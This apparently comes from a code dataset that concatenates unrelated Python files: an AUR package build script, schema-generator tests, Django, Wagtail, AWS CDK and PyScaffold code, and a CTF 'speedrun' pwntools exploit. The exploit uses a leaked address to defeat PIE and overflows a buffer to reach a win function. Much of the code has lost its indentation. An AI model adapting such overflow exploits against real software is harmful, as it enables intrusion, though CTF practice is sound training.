def build_package_recursive(pkg_name,
pkg_dict,
rebuild,
install_all_dependencies,
uid,
gid):
"""Build a package and all their dependencies.
Args:
pkg_name (str): Name of the package
pkg_dict (dict): Store for package information
rebuild (int): Rebuild behaviour:
0: Build only new versions of packages (default)
                       1: Rebuild all explicitly listed packages
                       2: Rebuild all explicitly listed packages and their dependencies
        install_all_dependencies (bool): If True install all dependencies, not only make dependencies
        uid (int): UID of the build user
gid (int): GID of the build user
"""
pkg = pkg_dict[pkg_name]
# break if a error occurred
if pkg.error_info:
return
# break if the package has already been processed
if type(pkg) is PackageSource and pkg.build_status != 0:
return
if type(pkg) is PacmanPackage:
# break if the package has already been processed
if pkg.installation_status < 0 or pkg.installation_status == 3:
return
# install pacman package if it is a make dependency
if (pkg.is_make_dependency or install_all_dependencies):
pkg.install()
return
dependency_changed = False
for dependency in pkg.get_all_dependencies():
pkg_dependency = pkg_dict[dependency]
build_package_recursive(dependency, pkg_dict, rebuild, install_all_dependencies, uid, gid)
if pkg_dependency.error_info:
pkg.build_status = 4
return
else:
if type(pkg_dependency) is PackageSource and \
pkg_dependency.build_status == 1:
dependency_changed = True
pkg.get_installation_status()
if dependency_changed:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
# rebuild only if new version is available
if rebuild == 0:
if pkg.cache_available < 2:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
pkg.build_status = 2
# rebuild if explicit or a new version is available
elif rebuild == 1:
if pkg.cache_available < 2 or pkg.explicit_build:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
else:
pkg.build_status = 2
# rebuild all
elif rebuild == 2:
if pkg.makepkg(uid, gid):
pkg.build_status = 1
else:
pkg.build_status = 3
if install_all_dependencies:
pkg.install()
return
def format_log(pkg, msg, prefix=''):
"""Format a build log for a given packge.
Args:
pkg (PackageBase): The package
msg (str): Message for the package
prefix (str): Prefix added for message in multiple lines
Returns:
str. The formatted build log
"""
msg_lines = msg.splitlines()
if len(msg_lines) > 1:
for i in range(1, len(msg_lines)):
msg_lines[i] = prefix + ' ' + msg_lines[i]
msg = '\n'.join(msg_lines)
if pkg.version:
return "{0} {1}: {2}".format(pkg.name, pkg.version, msg)
return "{0}: {1}".format(pkg.name, msg)
def print_build_log_recursive(pkg_names, pkg_dict, prefix='', is_root=False):
"""Recursivly prints a build log for a given package.
Args:
pkg_names (PackageBase): The package
pkg_dict (dict): Store for package information
prefix (str): Prefix for the message
is_root (bool): True if first recursion
Returns:
        (bool, list). Tuple consisting of the build status and the log messages as a list
"""
success = True
log = []
log_prefix = prefix + '├── '
intermediate_prefix = prefix + '| '
for pos, anchor, pkg_name in enumerate_package_names(pkg_names):
pkg = pkg_dict[pkg_name]
log_dep = []
if is_root:
log_prefix = ""
intermediate_prefix = ""
elif anchor == 1:
log_prefix = prefix + '└── '
intermediate_prefix = prefix + ' '
if type(pkg) == PacmanPackage:
if pkg.installation_status < 0:
success = False
log.append(log_prefix + format_log(
pkg, "Failed to install: " + str(pkg.error_info), intermediate_prefix))
elif pkg.installation_status == 0:
log.append(log_prefix + format_log(pkg, "Not installed"))
elif pkg.installation_status == 1:
log.append(log_prefix + format_log(pkg, "Skipped install"))
elif pkg.installation_status == 3:
log.append(log_prefix + format_log(pkg, "Successfully installed"))
else:
deps = pkg.get_all_dependencies()
if len(deps) > 0:
success, log_dep = print_build_log_recursive(
deps,
pkg_dict,
intermediate_prefix)
if not success:
log.append(log_prefix + format_log(
pkg, "Dependency Failed: " + str(pkg.error_info), intermediate_prefix))
elif pkg.error_info:
success = False
log.append(log_prefix + format_log(
pkg, "Failed: " + str(pkg.error_info), intermediate_prefix))
else:
if pkg.build_status == 1:
log.append(log_prefix + format_log(
pkg, "Successfully build"))
elif pkg.build_status == 2:
log.append(log_prefix + format_log(
pkg, "Skipped"))
elif pkg.build_status == 3:
log.append(log_prefix + format_log(pkg, "Failed"))
success = False
elif pkg.build_status == 4:
log.append(log_prefix + format_log(pkg, "Dependency Failed"))
success = False
log = log + log_dep
return success, log
def print_build_log(pkg_name, pkg_dict):
"""Print a build log for a given package.
Args:
        pkg_name (str): Name of the package
pkg_dict (dict): Store for package information
"""
success, log = print_build_log_recursive(
[pkg_name], pkg_dict, '', True)
for line in log:
if success:
printSuccessfull(line)
else:
printError(line)
def enumerate_package_names(sequence):
length = len(sequence)
for count, value in enumerate(sequence):
yield count, length - count, value
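# Sketch of what enumerate_package_names yields (count, remaining, value); the
# second element reaching 1 is what print_build_log_recursive uses to detect
# the last entry:
#
#   list(enumerate_package_names(['a', 'b', 'c']))
#   # -> [(0, 3, 'a'), (1, 2, 'b'), (2, 1, 'c')]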
def main(argv):
"""Run the main logic.
Args:
argv (list): Command line arguments
"""
parser = argparse.ArgumentParser(
prog='aur-makepkg',
description='Build Pacman packages with makepkg from local source or the AUR',
epilog=''
)
parser.add_argument('-g', '--gid', dest='gid', type=int, default=1000,
help="GID of the build user")
parser.add_argument('-i', '--install-all-dependencies', action='store_true',
dest='install_all_dependencies', default=False,
help="Install all dependencies, not only 'make dependencies'")
parser.add_argument('-k', '--keyrings', dest='keyrings', default=None,
help="Pacman keyrings initialized prior building (comma seperated list)")
parser.add_argument('-p', '--pacman-update', action='store_true',
dest='pacman_update', default=False,
help="Update all installed pacman packages before build")
parser.add_argument('-r', '--rebuild', dest='rebuild', type=int, default=0,
help="""Rebuild behaviour:
0: Build only new versions of packages (default)
                        1: Rebuild all explicitly listed packages
                        2: Rebuild all explicitly listed packages and their dependencies""")
parser.add_argument('--remove-downloaded-source',
dest='remove_dowloaded_source',
action='store_true', default=False,
help="""Remove the source downloaded by 'makepkg' before build. If not
the sources will be kept, under the condition that the source is of the same
version of the package to be build. (Note: Sources of packages build from a Git repository
will always be removed.)""")
parser.add_argument('-u', '--uid', dest='uid', type=int, default=1000,
help="UID of the build user")
parser.add_argument('build_package_names', nargs='+',
help="Name fo packages to be build from local source or the AUR")
args = parser.parse_args(argv)
# create build user and group
try:
grp.getgrgid(args.gid)
except Exception:
os.system("groupadd -g {0} build-user".format(args.gid))
try:
pwd.getpwuid(args.uid)
except Exception:
os.system(
"useradd -p /makepkg/build -m -g {1} -s /bin/bash -u {0} build-user".format(args.uid, args.gid))
    # initialize the pacman keyrings
if args.keyrings:
printInfo("Initializing pacman keyring...")
run_command(['pacman-key', '--init'], print_output=False)
rc, out, err = run_command(['pacman-key', '--populate'] + args.keyrings.split(','), print_output=True)
if rc != 0:
raise Exception("Failed to initialize Pacman keyrings: " + '\n'.join(err))
# refresh pacman package database
printInfo("Update pacman package database...")
pacman.refresh()
global packages_in_cache, packages_in_offical_repositories
packages_in_cache = [x for x in os.listdir(pacman_cache_dir) if
os.path.isfile(os.path.join(pacman_cache_dir, x))]
packages_in_offical_repositories = pacman.get_available()
if args.pacman_update:
# upgrade installed pacman packages
printInfo("Upgrading installed pacman packages...")
rc, out, err = run_command(['pacman', '-Su', '--noconfirm', '--force',
'--ignore', 'package-query', '--ignore',
'pacman-mirrorlist', '--cachedir',
pacman_cache_dir], print_output=True)
if rc != 0:
raise Exception("Failed to upgrade Pacman packages: " + '\n'.join(err))
pkg_dict = dict()
build_package_names = [x.lower() for x in args.build_package_names]
# look for local package sources
locally_available_package_sources = []
if os.path.exists(local_source_dir) and \
os.path.isdir(local_source_dir):
for d in os.listdir(local_source_dir):
            pkgbuild_file_path = os.path.join(local_source_dir, d, "PKGBUILD")
if os.path.exists(pkgbuild_file_path) and \
os.path.isfile(pkgbuild_file_path):
locally_available_package_sources.append(os.path.basename(d))
# get packages and their dependencies
for pkg_name in build_package_names:
printInfo("Collecting information about {0}...".format(pkg_name))
get_package_recursive(pkg_name,
True,
pkg_dict,
locally_available_package_sources,
args.remove_dowloaded_source,
False)
# build packages
if pkg_name in pkg_dict:
build_package_recursive(pkg_name,
pkg_dict,
args.rebuild,
args.install_all_dependencies,
args.uid,
args.gid)
# print build statistics
printInfo("\nBuild Statistics:")
for pkg_name in build_package_names:
if pkg_name in pkg_dict:
print_build_log(pkg_name, pkg_dict)
try:
main(sys.argv[1:])
exit(0)
except Exception as e:
printError(str(e))
exit(1)
| 2.53125 | 3 |
test/test_schemagen.py | hd23408/nist-schemagen | 1 | 11022 | <reponame>hd23408/nist-schemagen<filename>test/test_schemagen.py
"""Test methods for testing the schemagen package (specifically,
the SchemaGenerator class).
Typical usage example:
python -m unittest
or, to run a single test:
python -m unittest -k test__build_schema
"""
import unittest
import pathlib
import logging
import copy
import os
import pandas as pd
import numpy as np
import schemagen
import filecmp
import string
# Suppress log messages so they don't confuse readers of the test output
logging.basicConfig(level=os.environ.get("LOGLEVEL", "CRITICAL"))
# Sample files for testing
INVALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/invalid_input_data.csv"))
EMPTY_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/empty_input_data.csv"))
VALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/valid_input_data.csv"))
VALID_SCHEMA_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/parameters.json"))
TEST_OUTPUT_DIRECTORY = str(pathlib.Path(__file__).parent.
joinpath("test_output_files"))
VALID_OUTPUT_PARAMETERS_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/writing_tests/parameters.json"))
VALID_OUTPUT_DATATYPES_FILE = str(pathlib.Path(__file__).parent.
joinpath("files_for_testing/writing_tests/column_datatypes.json"))
# Test dataframes to convert to a schema. This should contain
# an assortment of the different types that we expect to parse:
# A - float numeric categorical (with missing values)
# B - uint32 numeric range
# C - string categorical
# D - string free text (non-categorical)
#
VALID_TEST_DATAFRAME = pd.DataFrame.from_dict(
{
"A": [1, 2, 3, 4, 5, None, None, None, None, None] * 5,
"B": list(range(1000000, 1000050, 1)),
"C": ["A", "B", "C", "D", "E"] * 10,
"D": list(string.ascii_letters)[0 : 50]
}
)
# This isn't really a dataframe, it's a dict
INVALID_TEST_DATAFRAME = {
"A": ["a", "b", "c", "d", "e", "f", "g"],
"B": list(range(1, 8, 1))
}
# The appropriate schema and column datatypes to create from the test data above
VALID_TEST_SCHEMA = {
"schema": {
"A": {
"dtype": "float", # This gets turned into a float because of the 'None's
"kind": "categorical",
"values": [ 1.0, 2.0, 3.0, 4.0, 5.0 ],
"codes": [ 1, 2, 3, 4, 5 ]
},
"B": {
"dtype": "uint32",
"kind": "numeric",
"min": 1000000,
"max": 1000049,
"bins": 10
},
"C": {
"dtype": "str",
"kind": "categorical",
"values": ["A", "B", "C", "D", "E"],
"codes": [1, 2, 3, 4, 5]
},
"D": {
"dtype": "str",
"kind": "text"
}
}
}
VALID_TEST_COLUMN_DATATYPES = {
"dtype": {
"A": "float",
"B": "uint32",
"C": "str",
"D": "str"
}
}
class TestSchemaGenerator(unittest.TestCase):
"""Test class for the schemagen.SchemaGenerator class.
"""
def test_ctor(self):
"""
Test that a SchemaGenerator can be appropriately
instantiated, and that it initializes its internal variables
appropriately.
"""
schema_generator = schemagen.SchemaGenerator()
self.assertIs(type(schema_generator), schemagen.SchemaGenerator)
self.assertIs(schema_generator.input_csv_file, None)
self.assertIs(schema_generator.input_data_as_dataframe, None)
self.assertIs(schema_generator.output_schema, None)
def test_read_and_parse_csv(self):
"""
Test the full process of reading in and parsing a CSV file.
Make sure the `SchemaGenerator.read_and_parse_csv` method
returns True or False depending on whether it succeeded.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that attempting to parse an invalid file results in "False"
result = schema_generator.read_and_parse_csv(INVALID_INPUT_DATA_FILE)
self.assertIs(result, False)
# Confirm that a valid CSV loads successfully
result = schema_generator.read_and_parse_csv(VALID_INPUT_DATA_FILE)
self.assertIs(result, True)
def test_output_parameters(self):
"""
Test outputting of the parameters file.
"""
schema_generator = schemagen.SchemaGenerator()
# Make an output directory just for this test
test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \
joinpath("test_output_parameters")
test_output_dir.mkdir(parents=True, exist_ok=True)
test_output_dir = str(test_output_dir)
test_output_file = str(pathlib.Path(test_output_dir). \
joinpath("parameters.json"))
# Set the output schema to a known good values;
# here we're JUST testing the writing out of the file
schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA)
# Test writing out to a non-existent directory
retval = schema_generator.output_parameters_json(output_directory="foo")
self.assertEqual(retval, None)
# Test success path
retval = None
retval = schema_generator.output_parameters_json(output_directory=
test_output_dir)
self.assertEqual(retval, test_output_file)
self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_PARAMETERS_FILE),
msg = test_output_file + " does not match " +
VALID_OUTPUT_PARAMETERS_FILE)
def test_output_datatypes(self):
"""
Test outputting of the column_datatypes file.
"""
schema_generator = schemagen.SchemaGenerator()
# Make an output directory just for this test
test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \
joinpath("test_output_datatypes")
test_output_dir.mkdir(parents=True, exist_ok=True)
test_output_dir = str(test_output_dir)
test_output_file = str(pathlib.Path(test_output_dir). \
joinpath("column_datatypes.json"))
# Set the output datatypes to a known good values;
# here we're JUST testing the writing out of the file
schema_generator.output_datatypes = \
copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
# Test writing out to a non-existent directory
retval = schema_generator.output_column_datatypes_json(
output_directory="foo")
self.assertEqual(retval, None)
# Test success path
retval = None
retval = schema_generator.output_column_datatypes_json(output_directory=
test_output_dir)
self.assertEqual(retval, test_output_file)
self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_DATATYPES_FILE),
msg = test_output_file + " does not match " +
VALID_OUTPUT_DATATYPES_FILE)
def test__load_csv_succeeds(self):
"""
Test that the `SchemaGenerator._load_csv` method can be used to read
in an appropriately formatted CSV file.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that a valid CSV loads into a DataFrame without throwing errors
result = schema_generator._load_csv(VALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
self.assertIsInstance(result, pd.core.frame.DataFrame)
def test__load_csv_fails(self):
"""
Test that the `SchemaGenerator._load_csv` method fails when
it tries to read a badly formatted CSV or is given an empty
filename.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that the FileNotFoundError is raised for a non-existing file
with self.assertRaises(FileNotFoundError):
schema_generator._load_csv("") # We want to test private methods... pylint: disable=protected-access
# Confirm that the ParserError is raised when it can't parse the file
with self.assertRaises(pd.errors.ParserError):
schema_generator._load_csv(INVALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
# Confirm that the EmptyDataError is raised if called against an empty file
with self.assertRaises(pd.errors.EmptyDataError):
schema_generator._load_csv(EMPTY_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access
def test__build_schema_succeeds(self):
"""
Test that the `SchemaGenerator._build_schema` method can build
an expected schema from a properly formatted DataFrame.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that when we build schema off of our test dataframe,
# we get a result that looks like our expected schema
(params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME,
include_text_columns=True) # We want to test private methods... pylint: disable=protected-access
self.assertEqual(params, VALID_TEST_SCHEMA)
self.assertEqual(columns, VALID_TEST_COLUMN_DATATYPES)
# Confirm that when we build schema off of our test dataframe,
# and include "na", we get a result that looks like we expect
(params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access
include_text_columns=True, include_na=True)
valid_schema_with_nan = copy.deepcopy(VALID_TEST_SCHEMA)
valid_schema_with_nan["schema"]["A"]["values"].append(np.NaN)
# Including NaN is going to make everything in the column a float
valid_schema_with_nan["schema"]["A"]["dtype"] = "float"
valid_schema_with_nan["schema"]["A"]["values"] = \
list(map(float, valid_schema_with_nan["schema"]["A"]["values"]))
valid_schema_with_nan["schema"]["A"]["codes"] = \
[1, 2, 3, 4, 5, 6]
valid_dtypes_with_nan = copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
valid_dtypes_with_nan["dtype"]["A"] = "float"
# Need to use np's assertion in order to make NaN == NaN
np.testing.assert_equal(params, valid_schema_with_nan)
self.assertEqual(columns, valid_dtypes_with_nan)
def test__build_schema_fails(self):
"""
Test that the `SchemaGenerator._build_schema` method fails appropriately
when trying to build a schema from something that is not a DataFrame.
"""
schema_generator = schemagen.SchemaGenerator()
# Confirm that when we build schema off of our test invalid dataframe,
# we fail in the right way
with self.assertRaises(AttributeError):
schema_generator._build_schema(INVALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access
max_values_for_categorical = 4)
def test__getters(self):
"""
Test that the getters for the output schema and the column datatypes
return the correct objects.
"""
schema_generator = schemagen.SchemaGenerator()
schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA)
self.assertEqual(schema_generator.get_parameters_json(),
VALID_TEST_SCHEMA)
schema_generator.output_datatypes = \
copy.deepcopy(VALID_TEST_COLUMN_DATATYPES)
self.assertEqual(schema_generator.get_column_datatypes_json(),
VALID_TEST_COLUMN_DATATYPES)
def test__get_series_dtype(self):
"""
Test that the method that determines the appropriate datatype, min, and max
values does the right thing.
"""
schema_generator = schemagen.SchemaGenerator()
series = pd.Series(["a", "b", "c", "d"])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("str", None, None))
series = pd.Series([1, 2, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint8", 1, 9))
series = pd.Series(list(range(1000000, 1000050, 1)))
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint32", 1000000, 1000049))
series = pd.Series([0.1, 0.15, 0.2, 0.214, 0.25])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("float", 0.1, 0.25))
series = pd.Series([-1, 0, 1, -2, 0, -3])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("int8", -3, 1))
# If min is 0, don't "fuzz" it, to avoid going negative
series = pd.Series([0, 1, 2, 3, 4, 5])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("uint8", 0, 5))
series = pd.Series(["2021-02-25", "2021-01-05", "2021-06-22"])
self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access
("date", "2021-01-05 00:00:00", "2021-06-22 00:00:00"))
if __name__ == "__main__":
unittest.main()
| 2.59375 | 3 |
core/migrations/0008_auto_20190528_1802.py | peterson-dev/code-snippet-app | 2 | 11023 | <reponame>peterson-dev/code-snippet-app
# Generated by Django 2.2.1 on 2019-05-28 22:02
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0007_auto_20190523_1740'),
]
operations = [
migrations.RenameField(
model_name='snippet',
old_name='post_content',
new_name='content',
),
]
| 1.65625 | 2 |
scripts/Biupdownsample/grad_check.py | dongdong93/a2u_matting | 22 | 11024 | import os.path as osp
import sys
import subprocess
subprocess.call(['pip', 'install', 'cvbase'])
import cvbase as cvb
import torch
from torch.autograd import gradcheck
sys.path.append(osp.abspath(osp.join(__file__, '../../')))
from biupdownsample import biupsample_naive, BiupsampleNaive
from biupdownsample import bidownsample_naive, BidownsampleNaive
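# Note (added comment): gradcheck below compares analytical gradients against
# numerical ones, which is why the inputs are small tensors cast to double
# precision; the timing loops further down use larger float32 tensors instead.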
feat = torch.randn(2, 64, 2, 2, requires_grad=True, device='cuda:0').double()
mask = torch.randn(
2, 100, 4, 4, requires_grad=True, device='cuda:0').sigmoid().double()
print('Gradcheck for biupsample naive...')
test = gradcheck(BiupsampleNaive(5, 4, 2), (feat, mask), atol=1e-4, eps=1e-4)
print(test)
feat = torch.randn(
2, 1024, 100, 100, requires_grad=True, device='cuda:0').float()
mask = torch.randn(
2, 25, 200, 200, requires_grad=True, device='cuda:0').sigmoid().float()
loop_num = 500
time_naive_forward = 0
time_naive_backward = 0
bar = cvb.ProgressBar(loop_num)
timer = cvb.Timer()
for i in range(loop_num):
x = biupsample_naive(feat.clone(), mask.clone(), 5, 1, 2)
torch.cuda.synchronize()
time_naive_forward += timer.since_last_check()
x.sum().backward(retain_graph=True)
torch.cuda.synchronize()
time_naive_backward += timer.since_last_check()
bar.update()
forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num
backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num
print('\nBiupsample naive time forward: '
f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter')
# ---------------------------------------------------------------
feat = torch.randn(2, 64, 4, 4, requires_grad=True, device='cuda:0').double()
mask = torch.randn(
2, 16, 4, 4, requires_grad=True, device='cuda:0').double()
print('Gradcheck for bidownsample naive...')
test = gradcheck(BidownsampleNaive(4, 1, 1), (feat, mask), atol=1e-4, eps=1e-4)
print(test)
feat = torch.randn(
2, 512, 200, 200, requires_grad=True, device='cuda:0').float()
mask = torch.randn(
2, 100, 100, 100, requires_grad=True, device='cuda:0').sigmoid().float()
loop_num = 500
time_naive_forward = 0
time_naive_backward = 0
bar = cvb.ProgressBar(loop_num)
timer = cvb.Timer()
for i in range(loop_num):
x = bidownsample_naive(feat.clone(), mask.clone(), 10, 1, 2)
torch.cuda.synchronize()
time_naive_forward += timer.since_last_check()
x.sum().backward(retain_graph=True)
torch.cuda.synchronize()
time_naive_backward += timer.since_last_check()
bar.update()
forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num
backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num
print('\nBidownsample naive time forward: '
f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter')
| 2.046875 | 2 |
sunshinectf2020/speedrun/exploit_05.py | nhtri2003gmail/ctf-write-ups | 101 | 11025 | <reponame>nhtri2003gmail/ctf-write-ups<filename>sunshinectf2020/speedrun/exploit_05.py
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_05')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30005)
p.sendlineafter('Race, life\'s greatest.\n','foobar')
p.recvuntil('Yes I\'m going to win: ')
_ = p.recvline().strip()
main = int(_,16)
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
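# The binary leaks the runtime address of main(), so the PIE base is recovered
# above by subtracting the symbol offset; the payload below then pads the stack
# buffer (56 bytes here) and overwrites the saved return address with win().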
payload = b''
payload += 56 * b'A'
payload += p64(binary.sym.win)
p.sendline(payload)
p.interactive()
| 2 | 2 |
coderedcms/wagtail_flexible_forms/edit_handlers.py | mikiec84/coderedcms | 9 | 11026 | from django.template.loader import render_to_string
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from wagtail.admin.edit_handlers import EditHandler
class FormSubmissionsPanel(EditHandler):
template = "wagtailforms/edit_handlers/form_responses_panel.html"
def bind_to_model(self, model):
new = super().bind_to_model(model)
if self.heading is None:
new.heading = _('{} submissions').format(model.get_verbose_name())
return new
def render(self):
Submission = self.model.get_submission_class()
submissions = Submission.objects.filter(page=self.instance)
submission_count = submissions.count()
if not submission_count:
return ''
return mark_safe(render_to_string(self.template, {
'self': self,
'submission_count': submission_count,
'last_submit_time': (submissions.order_by('submit_time')
.last().submit_time),
}))
| 1.914063 | 2 |
python/elasticache/cache/helper/vpc.py | chejef/aws-cdk-examples-proserve | 6 | 11027 | <reponame>chejef/aws-cdk-examples-proserve<filename>python/elasticache/cache/helper/vpc.py<gh_stars>1-10
from aws_cdk import (
core as cdk,
aws_elasticache as elasticache,
aws_ec2 as ec2,
)
from aws_cdk.core import Tags
from config import config_util as config
def get_vpc(scope: cdk.Construct) -> ec2.Vpc:
"""
    Look up and return the non-default VPC.
Args:
scope: the cdk construct.
Returns:
ec2.Vpc: The ec2 VPC object based on the vpc id.
"""
vpc = ec2.Vpc.from_lookup(
scope, "vpc", is_default=False, vpc_id=config.get_vpc_id()
)
return vpc
def get_security_group(scope: cdk.Construct) -> ec2.SecurityGroup:
"""
    Create and return the security group for the cluster, allowing ingress from the configured CIDR ranges on the configured port.
Args:
scope: the cdk construct.
Returns:
ec2.SecurityGroup: The ec2 Security Group object for the cluster.
"""
cluster_name = config.get_cluster_name()
vpc = get_vpc(scope)
security_group = ec2.SecurityGroup(
scope, "ElastiCacheSecurityGroup",
vpc=vpc,
allow_all_outbound=True,
security_group_name=f"elasticache-sg-{cluster_name}",
description=f"Security Group for {cluster_name} ElastiCache Cluster",
)
Tags.of(security_group).add("Name", f"elasticache-sg-{cluster_name}")
for allowed_cidr in config.get_allowed_cidrs():
security_group.add_ingress_rule(
ec2.Peer.ipv4(allowed_cidr),
ec2.Port.tcp(config.get_port_number()),
f"Allows connection to ElastiCache cluster {cluster_name}."
)
return security_group
def get_subnet_group(scope: cdk.Construct) -> elasticache.CfnSubnetGroup:
"""
Create and return the elasticache subnet group.
Args:
scope: the cdk construct.
Returns:
elasticache.CfnSubnetGroup: The subnet group that contains the subnets in vpc.
"""
cluster_name = config.get_cluster_name()
subnet_group = elasticache.CfnSubnetGroup(
scope, "ElastiCacheSubnetGroup",
cache_subnet_group_name=f"{cluster_name}-subnet-group",
description=f"ElastiCache subnet group for {cluster_name}",
subnet_ids=config.get_subnet_ids()
)
return subnet_group
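# Rough sketch of how these helpers could be wired together inside a CDK stack
# (illustrative only; the construct receiving the values is an assumption and
# not part of this module):
#
#   vpc = get_vpc(self)
#   security_group = get_security_group(self)
#   subnet_group = get_subnet_group(self)
#   # e.g. pass security_group.security_group_id and
#   # subnet_group.cache_subnet_group_name to an elasticache.CfnCacheCluster
#   # or CfnReplicationGroup construct.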
| 2.40625 | 2 |
src/pyscaffold/extensions/namespace.py | jayvdb/pyscaffold | 2 | 11028 | # -*- coding: utf-8 -*-
"""
Extension that adjust project file tree to include a namespace package.
This extension adds a **namespace** option to
:obj:`~pyscaffold.api.create_project` and provides correct values for the
options **root_pkg** and **namespace_pkg** to the following functions in the
action list.
"""
import argparse
import os
from os.path import isdir
from os.path import join as join_path
from .. import templates, utils
from ..api import Extension, helpers
from ..log import logger
class Namespace(Extension):
"""Add a namespace (container package) to the generated package."""
def augment_cli(self, parser):
"""Add an option to parser that enables the namespace extension.
Args:
parser (argparse.ArgumentParser): CLI parser object
"""
parser.add_argument(
self.flag,
dest=self.name,
default=None,
action=create_namespace_parser(self),
metavar="NS1[.NS2]",
help="put your project inside a namespace package")
def activate(self, actions):
"""Register an action responsible for adding namespace to the package.
Args:
actions (list): list of actions to perform
Returns:
list: updated list of actions
"""
actions = helpers.register(actions, enforce_namespace_options,
after='get_default_options')
actions = helpers.register(actions, add_namespace,
before='apply_update_rules')
return helpers.register(actions, move_old_package,
after='create_structure')
def create_namespace_parser(obj_ref):
"""Create a namespace parser.
Args:
obj_ref (Extension): object reference to the actual extension
Returns:
NamespaceParser: parser for namespace cli argument
"""
class NamespaceParser(argparse.Action):
"""Consumes the values provided, but also appends the extension
function to the extensions list.
"""
def __call__(self, parser, namespace, values, option_string=None):
namespace.extensions.append(obj_ref)
# Now the extra parameters can be stored
setattr(namespace, self.dest, values)
# save the namespace cli argument for later
obj_ref.args = values
return NamespaceParser
def enforce_namespace_options(struct, opts):
"""Make sure options reflect the namespace usage."""
opts.setdefault('namespace', None)
if opts['namespace']:
opts['ns_list'] = utils.prepare_namespace(opts['namespace'])
opts['root_pkg'] = opts['ns_list'][0]
opts['qual_pkg'] = ".".join([opts['ns_list'][-1], opts['package']])
return struct, opts
def add_namespace(struct, opts):
"""Prepend the namespace to a given file structure
Args:
struct (dict): directory structure as dictionary of dictionaries
opts (dict): options of the project
Returns:
tuple(dict, dict):
directory structure as dictionary of dictionaries and input options
"""
if not opts['namespace']:
return struct, opts
namespace = opts['ns_list'][-1].split('.')
base_struct = struct
struct = base_struct[opts['project']]['src']
pkg_struct = struct[opts['package']]
del struct[opts['package']]
for sub_package in namespace:
struct[sub_package] = {'__init__.py': templates.namespace(opts)}
struct = struct[sub_package]
struct[opts['package']] = pkg_struct
return base_struct, opts
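# Illustrative sketch (assumed option values, not part of the extension): with
# namespace "ns1.ns2" and package "pkg", add_namespace rewrites the structure
#
#   {"proj": {"src": {"pkg": {...}}}}
#
# into
#
#   {"proj": {"src": {"ns1": {"__init__.py": <namespace template>,
#                             "ns2": {"__init__.py": <namespace template>,
#                                     "pkg": {...}}}}}}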
def move_old_package(struct, opts):
"""Move old package that may be eventually created without namespace
Args:
struct (dict): directory structure as dictionary of dictionaries
opts (dict): options of the project
Returns:
tuple(dict, dict):
directory structure as dictionary of dictionaries and input options
"""
old_path = join_path(opts['project'], 'src', opts['package'])
namespace_path = opts['qual_pkg'].replace('.', os.sep)
target = join_path(opts['project'], 'src', namespace_path)
old_exists = opts['pretend'] or isdir(old_path)
# ^ When pretending, pretend also an old folder exists
# to show a worst case scenario log to the user...
if old_exists and opts['qual_pkg'] != opts['package']:
if not opts['pretend']:
logger.warning(
'\nA folder %r exists in the project directory, and it is '
'likely to have been generated by a PyScaffold extension or '
'manually by one of the current project authors.\n'
'Moving it to %r, since a namespace option was passed.\n'
'Please make sure to edit all the files that depend on this '
'package to ensure the correct location.\n',
opts['package'], namespace_path)
utils.move(old_path, target=target,
log=True, pretend=opts['pretend'])
return struct, opts
| 2.3125 | 2 |
tests/solr_tests/tests/test_templatetags.py | speedplane/django-haystack | 1 | 11029 | # encoding: utf-8
from mock import call, patch
from django.template import Template, Context
from django.test import TestCase
from core.models import MockModel
@patch("haystack.templatetags.more_like_this.SearchQuerySet")
class MoreLikeThisTagTestCase(TestCase):
def render(self, template, context):
# Why on Earth does Django not have a TemplateTestCase yet?
t = Template(template)
